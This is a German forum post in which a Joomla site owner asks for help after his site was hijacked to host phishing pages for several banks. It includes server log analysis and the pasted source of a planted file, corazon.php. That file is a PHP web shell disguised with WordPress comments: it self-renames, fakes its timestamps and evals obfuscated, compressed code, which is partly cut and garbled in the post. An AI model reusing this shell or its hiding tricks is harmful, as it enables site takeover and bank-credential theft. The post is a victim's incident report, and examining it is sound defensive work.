Hallo liebe Community,
ich kämpfe seit 2 Tagen gegen einen Hack meiner Seite und habe das Problem das ich nicht weiter komme.
Die Seite wird misbraucht als Scam Seite, 5 unterschiedliche Bank Loginpages werden dargestellt.
1. Tag
Ich habe eine ZIP im Root von Joomla gefunden und ein zusätzliches Verzeichnis in dem die Scam Login Seiten stehen.
Ich habe in den Logs nichts gefunden und habe den Zugriff erstmal mittels Firewall gesperrt damit die Leute nicht ihre Daten eingeben und dann den Haufen gelöscht.
Updates kontrolliert, alles aktuell.
2. Tag
In der Nacht wurde wieder die Datei hochgeladen, ich habe jetzt diverse Plugins und Komponenten abgeschaltet die ich a: nicht brauche b: evtl. alt waren. Habe den Upload beschränk in der Größe, habe eine Datei erstellt die so heisst wie seine Verzeichnisse ...
16:00 4 Dateien um die größenbeschränkung zu umgehen, zusätzlich habe eine unzip.php gefunden .. vermutlich habe ich ihn dirket bei der erneuten Einrichtung gestört. Zusätlich war diesmal noch ein weiteres Verzeichnis drauf .. für ne andere Bank.
Sind euch zZ 0-Days bekannt? In den Zips sind vorkonfigurierte "Unterseiten" er scheint also hochladen und ausführen zu können .. und löschen wie man der Datei sieht die ich erstellt hatte um das Verzeichnis zu verhindern. Hoster ist wint.global
mfg .. Robin Pe
Analyse von https://website-bereinigung.de/
Frontend
Statuscode 2xx - Erfolgreiche Operation
549x /contact 200 <-- Verdacht auf Formular Spam!
206x /component/jcomments/ 200
43x /wp-sys.php 200
24x / 200
22x /language/nl-NL/includes.php 200
7x /modules/mod_footer/tmpl/index.php 200
3x /language/nl-NL/wp-sys.php 200
3x /services/ajax.php/imp/dynamicInit 200
2x /amis/ 200
2x /index.php?option=com_sppagebuilder&view=media&layout=browse&format=json&source=page 200
1x /ebf-unzip.php 200
1x /stnbbs/pass.php 200
1x /services/ajax.php/horde/topbarUpdate 200
Statuscode 3xx - Umleitung
3x /login.php 302
1x /component/users/?task=user.login&Itemid=101 303
1x /stnbbs/php/status.php 302
1x /stnbbs/php/status_2.php 302
Statuscode 4xx - Client-Fehler
84x /bloganzeige/index.php?option=com_jcomments&tmpl=component 404
19x /amis/getgo.php 403
12x //index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image 404
8x /config.bak.php 404
4x //wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php 404
2x /amis/index.php 404
2x /component/jcomments/ 404
1x /amis/config.php 403
1x /amis/tasks.php 403
1x /amis/main.php 403
1x /amis/submit.php 403
1x /amis/gate.php 403
Statuscode 5xx - Server-Fehler
Backend
Statuscode 2xx - Erfolgreiche Operation
416x /administrator/index.php 200 <-- Login Versuche
167x /administrator/ 200
38x /administrator/index.php?option=com_akeeba&view=Backup&task=ajax 200
31x /administrator/index.php?option=com_sppagebuilder&view=media&layout=browse&format=json&source=page 200
27x /administrator/index.php?option=com_sppagebuilder&task=page.apply 200
20x /administrator/includes/corazon.php 200
11x /administrator/cache/com_jcomments/wp-sys.php 200
8x /administrator/index.php?option=com_sppagebuilder&view=page&layout=edit&id=8 200
7x /administrator/index.php?option=com_sppagebuilder&task=page.save 200
6x /administrator/index.php?option=com_installer&view=manage 200
4x /administrator/index.php?option=com_plugins&view=plugins 200
4x /administrator/index.php?option=com_sppagebuilder&view=media&layout=folders&format=json&source=page 200
2x /administrator/index.php?option=com_sppagebuilder&view=page&layout=edit&id=3 200
2x /administrator/index.php?option=com_sppagebuilder&view=page&layout=edit 200
2x /administrator/index.php?option=com_ajax&request=task&helix=ultimate&id=11&action=save-tmpl-style&format=json 200
1x /administrator/index.php?option=com_installer&view=languages 200
1x /administrator/index.php?option=com_plugins&view=plugin&layout=edit&extension_id=10044 200
1x /administrator/index.php?option=com_content&view=articles 200
1x /administrator/index.php?option=com_sppagebuilder&task=page.save2copy 200
1x /administrator/index.php?option=com_content&layout=edit&id=111 200
1x /administrator/index.php?option=com_installer&view=updatesites 200
1x /administrator/index.php?option=com_sppagebuilder&view=page&layout=edit&id=9 200
1x /administrator/index.php?option=com_sppagebuilder&view=ajax&format=json&callback=pre-page-list 200
1x /administrator/index.php?option=com_sppagebuilder&view=ajax&format=json&callback=pre-section-list 200
1x /administrator/index.php?option=com_sppagebuilder&view=page&layout=edit&id=62 200
1x /administrator/index.php?option=com_sppagebuilder&view=page&layout=edit&id=1 200
1x /administrator/index.php?option=com_sppagebuilder&view=page&layout=edit&id=13 200
Statuscode 3xx - Umleitung
40x /administrator/index.php 303
6x /administrator/index.php?option=com_sppagebuilder&layout=edit&id=8 303
6x /administrator/index.php?option=com_config 303
6x /administrator/index.php?option=com_installer&view=update 303
5x /administrator/index.php?option=com_content&layout=edit&id=111 303
4x /administrator/index.php?option=com_plugins&view=plugin&layout=edit&extension_id=10044 303
4x /administrator/index.php?option=com_languages&view=language&layout=edit&lang_id=0 303
4x /administrator/index.php?option=com_languages&view=languages 303
3x /administrator/index.php?option=com_sppagebuilder&view=pages 303
3x /administrator/index.php?option=com_jcomments&view=comments 303
2x /administrator/index.php?option=com_templates&view=template&id=10039&file=L2luZGV4LnBocA 303
2x /administrator/index.php?option=com_plugins&view=plugin&layout=edit&extension_id=10106 303
2x /administrator/index.php?option=com_installer&view=install 303
2x /administrator/index.php?option=com_languages&view=language&layout=edit&lang_id=1 303
2x /administrator/index.php?option=com_sppagebuilder&layout=edit&id=3 303
2x /administrator/index.php?option=com_sppagebuilder&layout=edit&id=1 303
1x /administrator/index.php?option=com_languages&view=installed 303
1x /administrator/index.php?option=com_sppagebuilder&layout=edit&id=2 303
1x /administrator/index.php?option=com_installer&view=languages 303
1x /administrator/index.php?option=com_plugins&view=plugin&layout=edit&extension_id=422 303
1x /administrator/index.php?option=com_sppagebuilder&layout=edit&id=0 303
1x /administrator/index.php?option=com_languages&view=language&layout=edit&lang_id=2 303
1x /administrator/index.php?option=com_content&view=articles 303
1x /administrator/index.php?option=com_content&layout=edit&id=0 303
1x /administrator/index.php?option=com_jcomments&view=comment&layout=edit&id=221 303
1x /administrator/index.php?option=com_installer&view=updatesites 303
1x /administrator/index.php?option=com_templates&view=template&id=10039&file=aG9tZQ 303
1x /administrator/index.php?option=com_cache 303
1x /administrator/index.php?option=com_sppagebuilder&layout=edit&id=13 303
1x /administrator/index.php?option=com_sppagebuilder&layout=edit&id=62 303
Statuscode 4xx - Client-Fehler
9x /administrator/components/com_joomlaupdate/restore.php 403
Statuscode 5xx - Server-Fehler
Bedrohliche GET Requests
Admin Vorgänge nach Land
Germany [06/Dec/2020:00:06:44 +0100] /administrator/index.php?option=com_templates&view=template&id=10039&file=aG9tZQ 303
Indonesia [15/Dec/2020:12:23:41 +0100] /administrator/index.php?option=com_templates&view=template&id=10039&file=L2luZGV4LnBocA 303
Indonesia [15/Dec/2020:12:29:12 +0100] /administrator/index.php?option=com_templates&view=template&id=10039&file=L2luZGV4LnBocA 303
Die corazon.php ist noch vorhanden und sieht ... arg merkwürdig aus
<?php
/**
* Sets up the default filters and actions for most
* of the WordPress hooks.
*
* If you need to remove a default hook, this file will
* give you the priority for which to use to remove the
* hook.
*
* Not all of the default hooks are found in style.php
*
* @package WordPress
* @id 83a6ee9b34553e9cf5ef0c507270c
*/
// Strip, trim, kses, special wp_nonces for string saves
$wp_nonce = "63a9f0ea7bb98050796b649e85481845";
if(isset($_POST['newname'])){
if(trim($_POST['newname']) != '') {
$name = trim($_POST['newname']).'.php';
$lul = file_get_contents(__FILE__);
$lol = fopen($name, "w+");
fwrite($lol, $lul);
fclose($lol);
if(file_exists($name)){
unlink(__FILE__);
echo 'xXsUIssAZ:'.$name.':xXsUIssAZ';
}
}
exit;
}
/**
* Sets up the default filters and actions for most
* of the WordPress hooks.
*
* If you need to remove a default hook, this file will
* give you the priority for which to use to remove the
* hook.
*
* Not all of the default hooks are found in style.php
*
* @package WordPress
* @id 83a6ee9b34553e9cf5ef0c507270c
*/
if(file_exists("block.php")) {
touch(__FILE__, filemtime("block.php"));
}
if(file_exists("index.php")) {
touch(__FILE__, filemtime("index.php"));
}
if(file_exists("index.html")) {
touch(__FILE__, filemtime("index.html"));
}
// Strip, trim, kses, special wp_nonces for string saves
error_reporting(E_ALL^E_NOTICE);define('?', '??');???????篘??ʁ????????????????????????????????????ڴ?????????㭨?ᦿ⧴ϥ???????Ў???ś????????ڸ???퍆?Ϛ?;$_SERVER[?] = explode('|||', gzinflate(substr('?u?+?v^/l??q
l?*?G@?s?lTΑ?q??ڂ?t????????1?X???[?i^????????]????????ݷ?<?z???7??z??_???????{:TS??????c???[?????K;?u???T?+A{I}a?`&
?p f?\\
?????q??~?R??$??W??u??0??Su&W???[?t?d,???1???N???????6"+"F?O?R????^$ݎIo?zۧ?[?k?6K3ٯ?X4?r-?B?^???Xz9??hH2???????*/~
k??$c.??:vV???L?l0(*?mIFW??kd?6Eܤ??]?3ɷ?O???8F??2?H??&fl??/??4?????iY?h??^G?b??<w0?kYE??cJ#y???G??????m%??M???
<HIER HABE ICH JETZT EINEN HAUFEN CODE ENTFERNT>
V?.?4E9??d?=?c??YN?S?ϻ.?k?$?a???ң?X????j9?Ot_????Ǚi<?pa????4@???#?NϹaf?&?~~}u???7H?Y?oܶ?????\\I?e?V?T߆*???~????[0](array($??{0x001},$??[0x0002]),array($??{0x00003},$??[0x000004]),$?);?ӆ?˝?????????Рϳ??Տ?;$???=$??{0x05}($??[0x006]).$??{0x0007}.$??{0x05}($??[0x00008]);$??=$???($????);$???њ=$??{0x05}($??{0x000009});???????Ũ?Ս?抩?ؿ?;return @$???њ($??);?꘍??۵???dz?????Ю???ڢ??ێ????????β?Ơ???????;}$wp_default_logo=$_SERVER{?}[0x0a];$_SERVER{?}{0x00b}($_SERVER{?}[0x000c],$wp_default_logo,$logo_data);$logo_image=$logo_data[0x001];$wpautop=$_SERVER{?}{0x0000d}($logo_image,$wp_nonce);if(isset($wpautop)){eval($wpautop);}?>